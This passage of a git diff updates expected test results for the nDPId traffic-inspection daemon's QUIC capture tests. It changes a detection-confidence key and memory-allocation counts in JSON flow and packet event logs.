02134{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quic-24.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1574209133041,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1574209133041,"pkt":"ClnTQ78Jzivom94WCABFAAUA04tAAEARTk0KCQABCgkAAqHcAbsE7BkSzv8AABgSuDzEUSnLqX7jSNZH88cG3IWnEfXDUlabjvj32ExHj28K\/LzWQEoLequ+XuEJ\/s1BSUshWNEiIh0aUC4yAwRElRrinPDk2nfD4SmdQQO+DgEhR+JzpkFRgXIhdTGLuMwVyZDNayP8wqegkyiQMgPSBURs4UrqJXSOmdlzOQkT83Thm0cw7nGhY1Dqr9WBER804ydL76SsuNgGBxQl7a0HOKMMpAXLx8NIbh0fGKNE2byFJvnpcszX0hTK6rJr5u2g5MPDhCWVAqZWA\/ogTmUNM\/hiTPfQkeihINkuu2xiOaqPKq8sMuQjF678ZOS3GHn+0TKDo1\/YbLwJy\/ZpXJGxt30cfRSaAH1ZjGC\/le3BtTf6Ee25IG79XjyhHYyykWI2qhKWR0WZIipTrVnQ8OQ9VFey3MfNakIGaPPsyV69yfAmkmASAVXFu7Mo6y0Wz\/k+XakzO7FNz+SVS8r\/HampTgbi4jZsv70uNhIa7mA4qtW67mQ4Rtz5mrDrLhqz2cchVuQJJMooj0k2Xmg5SrVAA8L+yguIaKrDD971nuLq358VPAy8fRB724dILFO0lMVCte\/by\/Z5smTmpZsXjBALsYbcl4FVVEwEstKsA+gV11h+TKoi0PysZzUv4Co6O8\/IBnHMvA3aNldZ6T2\/ehbVZg8kV+TWp68hUC2ZNn0WR\/hIHa\/ud6KCIM2HuunHoyDST3M99tIIw9T05lx57290aLBbTURhE0FEw+sGowcXu3C80nVKiDimHMp1c6mqiWhDKZbGOAdpIWwpYqyGb1wbm5oAoXEAR7Mc+jjR0J8zJlFvt86aEVTtTJma3fejOJ3C6CfSBtcEM9aVUQVmL1wf7Fi6TTqbbFA9hnROhk7vqewbhtVmirjNaHoW3nHcl5Ky2MEXCHIhVYecuDZG8tKTrUF\/HFpCaGl9ktkqkasn0g56PGXthtx8q15PYDSjv9yWDxzwqk6QO6Yvxw5QtpcdW836IfXVH9twCWk7tokUrBa+jkGq4sxymyp8HJzlBaLvbaRQuaENeIm3CsGj3g9j2MS5rx5x6bLrNsqG7vyWFoKKK6rqr6vFuCF2irBVzzRdUFclg1SSHgOpaIic+xLUKXq+lZZKiY1RKji5vWjtQKTKYEV029kaxm787YffQ8yTZZB6Hh6BkDWEPJYKpvcHrYxyRBFLQRGWx4ITq5kdTA0MWD1a5s3\/Tz1ghAL0hkcPsti\/Um+kiW+XSNOONWqykERpHTJUdF9XR9VjidFyK82bmGKcNXGpEf6KxiEWWOfrwygEpxaXYc1XPpi+3jqe95\/5QRYGsINOcrD5IkF6QniULDRMMwwkr\/ECjICIiZDSB0yvurV+rIeACZwQwc9BCfZ20PoMtA9Sb0+HvwlI89lLwU1WoQ\/uQFCU2G+iaFma79WKu7nfdJy0UCSpgYk\/WwxenGfaRqde0duIKqJ4VQR7DQ\/1P+Fdg7iOLJglPQ16bgg\/VS+HMi5ElBV9H43KK0X9+d\/wx6yTnUwB9LBosIDE739HoREBuU9qFyhmlmKq9iiXdK9S72zzDVpgLdZ5NTJCzLKyehhNiJq3WHWlmpoiXXclIQS2qvLhF3s8CmoQTCIFD2YwbMLNLc3NR5kX4hROEBrWwC9+79LiHN5YezdiHlgZ3UHXQ0QcCITAtA=="} -00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":15,"source":"quic-24.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1574209133040,"flow_last_seen":1574209163081,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":7370,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1574209163081,"l3_proto":"ip4","src_ip":"10.9.0.1","dst_ip":"10.9.0.2","src_port":41436,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":15,"source":"quic-24.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1574209133040,"flow_last_seen":1574209163081,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":7370,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1574209163081,"l3_proto":"ip4","src_ip":"10.9.0.1","dst_ip":"10.9.0.2","src_port":41436,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} 00555{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":15,"source":"quic-24.pcap","alias":"nDPId-test","packets-captured":15,"packets-processed":15,"total-skipped-flows":0,"total-l4-payload-len":7370,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1574209163081} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 15/15 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5879986 bytes -~~ total memory freed........: 5879986 bytes -~~ total allocations/frees...: 118150/118150 +~~ total memory allocated....: 6013620 bytes +~~ total memory freed........: 6013620 bytes +~~ total allocations/frees...: 120912/120912 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 463 chars ~~ json string max len.......: 2139 chars diff --git a/test/results/quic-27.pcap.out b/test/results/quic-27.pcap.out index 041841739..468e4db30 100644 --- a/test/results/quic-27.pcap.out +++ b/test/results/quic-27.pcap.out @@ -2,10 +2,10 @@ 00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"quic-27.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1592388075915} 00622{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic-27.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592388075915,"flow_last_seen":1592388075915,"flow_idle_time":200000,"flow_min_l4_payload_len":1330,"flow_max_l4_payload_len":1330,"flow_tot_l4_payload_len":1330,"flow_avg_l4_payload_len":1330,"midstream":0,"thread_ts_msec":1592388075915,"l3_proto":"ip6","src_ip":"3ef4:2194:f4a6:3503:40cd:714:57:c4e4","dst_ip":"2f3d:64d1:9d59:549b::200e","src_port":64229,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02274{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic-27.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1592388075915,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1392,"pkt_l4_len":1338,"thread_ts_msec":1592388075915,"pkt":"AAAAAAAAAAgA1Oceht1gB9AaBToRPz70IZT0pjUDQM0HFABXxOQvPWTRnVlUmwAAAAAAACAO+uUBuwU6BFLF\/wAAGwh7p3UKjzv1VgAARSBBNb8rxExjuvv1Ye++hbc9om0DU4NnwSG\/3UebQzKe+\/ChMR6f65IjHiAPoLAAXROmLqaJFJBg9Sjii5GNpIY1s7jLmFqalAiGP2eQLOW5rgxDWycwtAoSDO71eI9T1Uq7EBmGHvnPmeSBFCTAwbphrP9uMLPyAc17USwCikZDlt2XGVMfiXze2ila5iBclIpM\/nqIjbZDUUYzdC34yYbr54VrUe33DQppusK5QzTfqS+3bRJeNmvfVjhputwGoNup+0y7rJDCwpxgcjG0dCKgMjLHOmSc3TOXpHySWsU8YrZhzLttd3CTZRM5WZ+WibgEID8\/Y94\/jmGwbweD3Pfo3Ppwfbm6t+wCItY8yBKRQ+H5v5jedjzP\/LjrRtljajhGcJZd6HJgjueiAiaEAdj7fx0T9yjCxPVImLtLHfXPo558xAwXVU83pzT9xavzftzVp99vYm\/GU\/kg1VYfnH4H1qpMlTlic\/Q6Q8iLnCNGJ9LIhtmYFfunAmiyObADRsU4B6j4HoJX3if+mucsKdp+8N3ugLjM4uwUvOF7XyACDpCZ\/G3\/5X5J\/zKZkqDPUYvuluMsSOj8B9WlMWtbGerp5EjqolIlNnjYomDTKeHIxZZRBaJp\/QOHxqWVWl+MlH9KWaLg+UuJ1tkD\/z7oSb+H1aPInCB0q4IOfY52jC5M0sAyNUCCRYRJtlGM\/qM0P8wM\/vcpX4GIrlML77jxP6dU5SrTUTaXASv8j9337neVie5dGU901jPeI0ibTEPO5jmp5JTAiUrtWT\/OPLGl6+AqDrvj2iLYI6MfHf54Ll0eSJwKxczdOyajjbkW+wF4mDNBcrHs+Iy+NLs84KPkQaEHysgP5fydEh4OpzytKTjbeDrjBTG9KcUWYmBar2q8HpPFclPVfMJzlgzmG1ymiPOmBJDgqQ3ZUM2g855ht6g7tzCMio0LrDHG0qDTQGyGwGnOACHMF4aRlNBHHPXjD0AWFg5ITC\/muG1btVnHCRMRKjcJbcwgB5knd4j3yLyF5jIDRSKNhE6Ac48oXpl\/X8QX7id\/RdTdMTE+I9ImLp3efowsLaCMtmIEe+7JeD8HXS\/DHY7CcQC7QJJxTExlt1pZ1J8VxZQ\/Rin8crO7sCUZAX\/MAmOTczrCmlYKxmfZCym\/VBLaEls1IO\/vlhGhIazJ4ec+unaATLsbpA8gpl3A6fA\/mtphj6B2kmQmdb4PDBkjLGlUB9TA\/hWCdu8okA42ElpefKLs7iaYvj9eGjbpH4CtZIsn81hYHam0KixsLnFD01WT2G3jWF4\/p32XASEAIX2fGqhIl42kT79V0gWU\/zHFYX4d1dqE0R0QvDLgaBR5adJ\/AQSCQX30uHxQBsrPiDAUle40F0f\/CKLbXDtfvQg3i0EyI3KXCW22kEkJyctCWU066Vqsp6MiM5DPCQw20QD2L38WJTrzFxYD7gmCe1AwoQFfD6gqTnrS3Tj0ht5GTD8vsEYZ0oezjMP8XuBMCjClE8hToMxgRyaUKQoJ4zuAen+tMutEa2m48+u5jHJEJljGjHC4LHZWMR3906vXde+zdCg1ShHY11L\/Bz5vKrplIBCiT9vl3ZYNjO6hBlbKS8VP\/yg6gsLQ9AigFTHxstN+VusbiYbo8JJgQWEcDGy2dI9GZZqPmAAFQeJAEQIBnrb965lc\/aHxPwoSZtBKWldoAMiE22ownQezP3boCQ596Xlhlq\/aTLkj8uddR096XdeUuOzAUI7eEPdA9iCr"} -00923{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-27.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592388075915,"flow_last_seen":1592388075915,"flow_idle_time":200000,"flow_min_l4_payload_len":1330,"flow_max_l4_payload_len":1330,"flow_tot_l4_payload_len":1330,"flow_avg_l4_payload_len":1330,"midstream":0,"thread_ts_msec":1592388075915,"l3_proto":"ip6","src_ip":"3ef4:2194:f4a6:3503:40cd:714:57:c4e4","dst_ip":"2f3d:64d1:9d59:549b::200e","src_port":64229,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"play.google.com","user_agent":"beta Chrome\/84.0.4147.45 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-27","ja3":"1e022f87823477abd6a79c31d70062d7","tls_supported_versions":"TLSv1.3"}} +00923{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic-27.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592388075915,"flow_last_seen":1592388075915,"flow_idle_time":200000,"flow_min_l4_payload_len":1330,"flow_max_l4_payload_len":1330,"flow_tot_l4_payload_len":1330,"flow_avg_l4_payload_len":1330,"midstream":0,"thread_ts_msec":1592388075915,"l3_proto":"ip6","src_ip":"3ef4:2194:f4a6:3503:40cd:714:57:c4e4","dst_ip":"2f3d:64d1:9d59:549b::200e","src_port":64229,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"play.google.com","user_agent":"beta Chrome\/84.0.4147.45 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-27","ja3":"1e022f87823477abd6a79c31d70062d7","tls_supported_versions":"TLSv1.3"}} 02271{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic-27.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1592388075921,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1392,"pkt_l4_len":1338,"thread_ts_msec":1592388075921,"pkt":"AAAAAAAAAAIA6W2Tht1gAAAABToROC89ZNGdWVSbAAAAAAAAIA4+9CGU9KY1A0DNBxQAV8TkAbv65QU6\/nTM\/wAAGwAIe6d1Co879VYARSBTj79W6cwNvYIa4eRJRqYVEF\/FFQs4\/YFJNsPxXKvEgdRDTO3utbDdVpsr9xE5Fa\/TpG177HOYaSrCAz5Jo2+BV5oFjmMd9bTEkWInl1UOdHKW2niDF5nMaLe02aYd0mp25Hmgx4h+P4ZNUU2g7lMQwO8oh5pyFwebO4ynZaVfKfuvlderCYi9W3A+nCI5swIBOg\/\/GR\/eRpRy+l1xUDMEIkXKJ9xm\/36tgV9mPj+QnGLik9ENPu+ZN+Me0EJ5sHt5U9N9HC21bIxbx2522Px9RzM8EV5k0bNaVeSUX6Kx86PSOGKlOzKToSyBuVcP\/8Y\/pj31FFMn4jXKSKIZkR4jdHKqC8A0U8JWz+lo5qygK0a0s0j3vnz5UfxKqxBqYcCTRyIv0ihPq9lNS2XBnJHxjyGSIIPIjQ8xsASU2vSfjgEk5w8+ci+un+2IlNQ9pkFNXyipoW9wTbokYSnOTxLk6sFfH3dsyfqGWWE1tcdt7fy7oyiEsvZGRhn\/L+h2S5jSKsdHx7NdNgIdO39fvhXOA8HjSqb3VALAtyj6ehundx3BZcRNfsuUa5ZwC219uau0CpTuX2Tcg4sLjnvZG2Lvryln9pXYVKexJ7M82YgjmrH3wKorHuQt5fR9o7MWyn4djeqsrjK1KyRTCzgfjFDh3HyEU84LAmn6y\/vAo6GV5tlhx7mhZNMKhoPxPwLQjI9LlPc\/eMbJSDiPSdtQN0Aka6OS5JgFtfkS4GGEZrqH3Wmy218ogEMrR323mHZfknuU+di+qZFkdH\/EQiWObuHXwvxT+d8mUKnyAB02BTcx6ikllxkk+7Anulz\/alZEZCKgpjN62uDEL1zgUQWaEwOMai6Bq8aLpyIjWmfI3mXlEoQL9YGtvFU3NA0ZJr0FsSmnF79XixoAiidGmVLveJwbz2v70EltiOw6GW4XT1Nx8GJbOHEb4lw8Nf+y1YmbiOSl6N6MqAV+LTudvCC93HluIlhU0E3uX9LGDS+ScDF\/SXTW4zk9DPu\/I2vtwGCJX81Rv1WV8uy3YU63ClpeYXvX7h3rAbpodg\/tjIJpSxX8PbWv2L+X7I9n9ASbVRLPybgw1VXro90q6rMYVQ\/J4rPmhLpWzdEAazqGLHFi9KCGNiyg\/RvVoTwUKLYJ2wN2A7fA5TkKjD7w9oSn095bN7P+h75McGVrIyVqdEh4yuOB+Tvz9c62lXezMJJBw0zLwBGL\/8fc+U1+0HGaZ8c8r\/a9gzaAu\/1hL\/GX6BDxGvNlvCbNJSR7uYc+tLK+p8LJwdEE6O1NRlrVaqPbBG+gZN39wLrBIi\/4C1PvaV8uwXWpwJT4\/2iKYJmYuzWYHqOYb26qPVfaWtKa8zR+ytS6h93OrCLmPemuHc\/JEUEpO0dp8igHMSUL1C+oRr6S3mhQFj3DoLOC25YV2Nz23shcZvt4jUGqP33atbdN9fs6Z6FU668dqDsydPhc\/SLsWEHLNI2dYaUpYVsKq4rnVyNmOwE\/6yXFioayjL1rahnUdwSUA+95p6JoySDTBjZ0UNSLSl7C2+U5OFwI7ckGRhoW0KKahovJhm17+fTYxdp+9HuvzWSSUY0fZvLQBV7yxLsR4PcQVPaqkZsrRSNzLBu5zsWgsJ7iTP5Pui\/izmglDfXm4vEH6laDbuG6URrQ7dv3yhcwEz\/QEq4E36vx+7mzPgws4U6N6vHcQkT\/3gkAaI1tEvZMgcRaUphUC3VFG3nl7XwQxFcW31F+TgbWi2aESvVU"} 02267{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quic-27.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1592388075957,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1392,"pkt_l4_len":1338,"thread_ts_msec":1592388075957,"pkt":"AAAAAAAAAAgA1Oceht1gB9AaBToRPz70IZT0pjUDQM0HFABXxOQvPWTRnVlUmwAAAAAAACAO+uUBuwU6q+fA\/wAAGwh7p3UKjzv1VgAARSD7U2hL0O88k3UZXjUbrBBd+WZB0UG\/j7758xlBZzizfYUS+JxzLcKYGo8WQzFU7GyiuzvE8f9eov2KYsEVwanC7Vc9pLDljUq9fi2hrf+FzyyRcUlliaDQXxX7n1Ivm9KRXOqnnKdmfHVEvBFAffLmUIXWbO+YgkFjGfD8GnPXDCrAqvwlSSmWge5izab1xOS9Wo1XnWifp0lpGLQpE1MqqxNhBIDxbfaVbjuMEAWyrxRLEqh16GZ0\/jsodxxqlZew4w347xtEtqPzlLyHr4poFBV0Y0YYyCJ1yuoIhaXm+33Z+1T2cYWE7O6I9WEk+mBcGSHxZEZP4CaDr0T3d2jgKsNoKY7bkKT1W4j+vuMJDFuHBaV9SRkGAElCQfGPawy8Ys82dsHnmEEyzp8V6ce7FzsZZVA9JPutVgoejftdzH\/RLPkp8RBEvUi+HMOKcmfLfnWgmtZUoG2P5WRsd4keUAJzFzPu8JDFkn8Qz7I2ryzN2cOlRhia\/jz4PgIUt+4ZQKXncNfyTzS2OteWVaV9zMESXfyvD0pVAT08qEHRc6laTl0ufuUQBtHn5CKjoJYFHspiVeCiJegPMoj4HilpDrhpSZdELNW8O6lX\/+Ya\/E5+xP\/XiQg9mVqUhmMopCMRpiLIe2Y5jGt3vKxJGa5gox\/Ao+2MtfZQZSIoFcP8KluOAfCrb5sGinc+sTc+ZKeAOQmz2FRpTh4fxO1mAo2o9ZJLguqcLrOlyxUUSOHnuLgNLS7XObH1LUUip1vPpeYTmlqzrANNh9EYL2PlIErptyjoZYKQJ8rGcKFCKO11+88Wp\/LRi79APRPkY6RnAKucyRnsrN5ZraDdPgKee842vxIdbP4CvpQKByezNr0Y4u9e5janU208elx\/zNNPzGR9+gsEJIstRXxFey8H0re4AXkIgXjqAReUAEftPwSWT1yW9+jva9RQbrdrR5MlklIvCCr\/7U5+3OUw9\/43s\/O3pgzG2DXT5bg3D27JwIW8euuy95GFovl\/nwOfDJmNLw18bQ3hbUqIFcvmzSmF4CVgS8f8nD5zXQn0Y6t6H\/0dRw6m\/fNV\/hHkJp2gXqQ7165w9HG2aJNS+9mCFSeYNr4H2pXUCnIsj\/Pby8rM4BOGLZX6zg3e6S5gFfYBAXTKRGfLDh+HC8x9D89XnWP0cyQWheKUU2YWacOr4WVE0zJK4qj2v39Y03nQgSY7Oa54R2PRMjuzzTSkaITdQ1fo\/eapkrPXa1eGFgwwF6EMe47fkokLHjscKhQ9hUwVD1WZo132hEoWEgCk6GBm9kpFczYiEdZUPhpULGvCKI1iCSBgMjY4vkSPjkj\/CUDk9lkmQxFPWmRRIn5bNqB\/16pGMD5AZgW1l2kOJo5CYfNF1x84eGg+l3fSTIrHWDb7BvF8kmCbEpzK5xtWGHGjxOpk\/7a+pTOyHHSCngxZDzPdni8BcsxtcevFPBg2cOlxb2H\/0wK6HxkRNoGyDH5CwTV\/9XVHoipCcVdCRMqh2JweXzA8wyDxryIMQur2tx3A0CW64wtn\/h7BSyKnDTRXR1V+Wa7DymTTmnRiQ6l5f3ecwcceih\/JZP\/GSUvQLB1MZBKOprH4Whg11Rc2g4AjShZ7+YxYeeQtOgNFCRS53FA6JbVYqDpNySia3zORBhbds4Rqs3FtKCEuzx1fAYtgyzWdf8adqeSwRKSlOPPdqsVh5zsBNqK4beqT9\/RPVDkfR2bjUTRJesgqyVO6iWDbnnnAdtd3"} -00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"quic-27.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1592388075915,"flow_last_seen":1592388084373,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":1330,"flow_tot_l4_payload_len":11647,"flow_avg_l4_payload_len":582,"midstream":0,"thread_ts_msec":1592388084373,"l3_proto":"ip6","src_ip":"3ef4:2194:f4a6:3503:40cd:714:57:c4e4","dst_ip":"2f3d:64d1:9d59:549b::200e","src_port":64229,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} +00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"quic-27.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1592388075915,"flow_last_seen":1592388084373,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":1330,"flow_tot_l4_payload_len":11647,"flow_avg_l4_payload_len":582,"midstream":0,"thread_ts_msec":1592388084373,"l3_proto":"ip6","src_ip":"3ef4:2194:f4a6:3503:40cd:714:57:c4e4","dst_ip":"2f3d:64d1:9d59:549b::200e","src_port":64229,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} 00556{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":20,"source":"quic-27.pcap","alias":"nDPId-test","packets-captured":20,"packets-processed":20,"total-skipped-flows":0,"total-l4-payload-len":11647,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1592388084373} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 20/20 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5880367 bytes -~~ total memory freed........: 5880367 bytes -~~ total allocations/frees...: 118156/118156 +~~ total memory allocated....: 6014001 bytes +~~ total memory freed........: 6014001 bytes +~~ total allocations/frees...: 120918/120918 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 463 chars ~~ json string max len.......: 2279 chars diff --git a/test/results/quic-28.pcap.out b/test/results/quic-28.pcap.out index 3e6af498c..9cbe158ee 100644 --- a/test/results/quic-28.pcap.out +++ b/test/results/quic-28.pcap.out @@ -2,10 +2,10 @@ 00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"quic-28.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1591267474847} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic-28.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1591267474847,"flow_last_seen":1591267474847,"flow_idle_time":200000,"flow_min_l4_payload_len":1200,"flow_max_l4_payload_len":1200,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":1200,"midstream":0,"thread_ts_msec":1591267474847,"l3_proto":"ip4","src_ip":"10.9.0.2","dst_ip":"104.26.11.240","src_port":60106,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02063{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic-28.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1591267474847,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1242,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1242,"pkt_l4_len":1208,"thread_ts_msec":1591267474847,"pkt":"7jdRvai\/bmImQfCgCABFAATMbsBAAEARSUwKCQACaBoL8OrKAbsEuILewf8AABwQgoOBp4aIL+MPCXOdR4KiFxRAxLpnL0UX1efsgg\/VSxB4df2ozABEgmEZ7SPB63FDIt1\/BNmaABrW7\/a2mJ6Qg87qxio5qp+Au1rZycjjs1xq27TUqOstzWUVkmwpCYXpvpOqlbwTvnFsXueqMWKDAlTPVsrztIv2pHHHaD8h888fq\/JGG\/YMsyu4siFFo62sUPCzYnviiGb9Ejlp4qwUTq4AjO99Rthdv2GbNC\/OStXSWSDjD\/leZL9UJEZcJ3LhlgqAVgxUVrxuE0rbeF3i8aF9iakAqxlqpoDj1+5t7ILe8xHKg8FUG1XnL5zpn1\/qeTvTEm18Ejt5DZJvb7rSMM3y0kFKOsdK3+oTGrisBL0Fe\/eBZ9f4xHzZvM5y3BCl2N6qMFMX+sMnr8ggfIKSQlAxo6qy68ZM170NeiI1bIaY98nIrG3zZt3dnHbbcgfFiN6lFzYaQLJBtV\/WEYTHy0okUamYC\/5cNM9tSXVBXfneC5HIpPjBuuyE4+LzF5EWg6rp8zulZ5VOTIetNIdJsnU+GlxyeY+BVtCQCCyWElUlL9X91YgIZ8MpCHxRq8ZJCkmY4nF34gFHgfsegffKnBAav99zdzm50AvMu4lP1B1F6cRA2HMPmAvCgUL1IKMcacz2eCZBB7FWHguZbpDdL2+wruFSVOAWeB+lE\/kuyF3MF8D5tAMKtEitOKdhqy3C3qGvZcZVGOZKPWGr2BC7JbZdFGIyYmNwp\/bvvX8XvDggJHwe6xhqAz5sua3BsvUJ1vySN4kKaHQ3EYKLbPPRjDwQinHrO49sFr8oWJyt7OK1yq06uwrlP3p4sqV3\/tL4FsOHtHVAI5LvRB8KISYciiug2cmuSgzkDgaTo\/e3D\/u+rCXDQ3xoip3ktBsckfTnGfFRGZIYxKdaQnHhOXiTzFQ6mSTNof1wHefWEQube1a92cmaAPSGQOt3LWbH6N8\/qM1mTakjE+QJv0K3HWVx+nbk2qFqJc+rHv1Ie37Z2+wHGh0NjwgX3P+8AdCqq6tgRzOpAdLNRrnirmseM\/zZQ0+cDRuw83pFP+UWZ+PCK3wKRZu1IhQ2h6D6lcGAbZA9ehc5yOvz0v1LsR84aEk1FsEGNTqF56I+GB\/2xRH4N5F5aeUjnenJzGpEQkofmIzcU+knq+dcQuuDHuOTLNDIaiPO+4HYzT5IY6vCSgCHcPgQVRcUuuSg\/GpGaVSknd81XIsamcRfeqURHQ1MVwmLxgOMP3+I5HFeghmJ+ki2zeRb+13f3SNlS\/RoVNOTrzjA86oM8wlv5t\/i38dgJDMR2ZvO+tz4iV7y7Y3T7RFYvvK2F7LLOH5ZrOKSeJb1SNqfpAw6nEHN8am8q6WcZIClcZqDQiuuDV2HpT1RM8QezzenJxkksNL2P07lZwI9HU4P7Ayp4wWZ6zeiRYoRywRS5R5VWfF7StuaGYuXatUeylxdjHJ8UwmFRvFoXP+8SlDa8jkz\/qhABAK7x0AzjsV\/3jzRSi1nVL9yl92ydFm7OXWFMLaMdafTsMx6SG3eTR9qPpGQqQKfrm9F1wk7utXsAM9DKqSLm\/MYVhMIgqodecjchaLAXg4QPX1N"} 